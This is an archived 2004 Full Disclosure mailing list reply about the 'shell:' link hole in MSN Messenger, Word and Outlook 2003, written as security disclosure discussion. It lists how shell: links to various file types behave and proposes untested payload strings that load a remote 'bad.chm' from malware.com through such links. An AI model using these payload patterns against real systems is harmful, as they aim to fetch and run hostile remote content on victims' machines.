Full Disclosure mailing list archives
Re: MSN Messenger is vulnerable to the shell: hole
From: "http-equiv () excite com" <1 () malware com>
Date: Sun, 11 Jul 2004 16:17:29 -0000
<!-- Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft Word 10.2627.3311 launches Notepad. --> this can be very interesting. The same in Outlook 2003 both html and rich text. Good thing the named temp file deposits were magically patched. As Andreas Sandblad mentioned the other day the assigned application will open depending on the file extension. In Outlook 2003 shell:foo.hta will open an empty Html Application window shell: foo.chm will run hh.exe with an error shell: foo.js will run Windows Scripting Host with an error showing the full path where it is looking to run foo.js shell: foo.eml completely screws up Outlook Express with a series of errors the idea then would be to run directly through the non-existent file it is trying to open e.g: shell:foo.chm::http://www.malware.com//bad.chm::/foo.html or shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html either that, or get something into shell:foo.hta or try to resurrect the named file in the temp. Lot of possibilities including embeddeding the file directly into the mail message and linking to it. All needs to be thoroughly examined though. Which would be unfortunate for the peculiar completely clueless few who think that you just "flick" a switch and the fireworks begin. -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MSN Messenger is vulnerable to the shell: hole Jesse Ruderman (Jul 11)
- Re: MSN Messenger is vulnerable to the shell: hole Lan Guy (Jul 11)
- <Possible follow-ups>
- Re: MSN Messenger is vulnerable to the shell: hole http-equiv () excite com (Jul 11)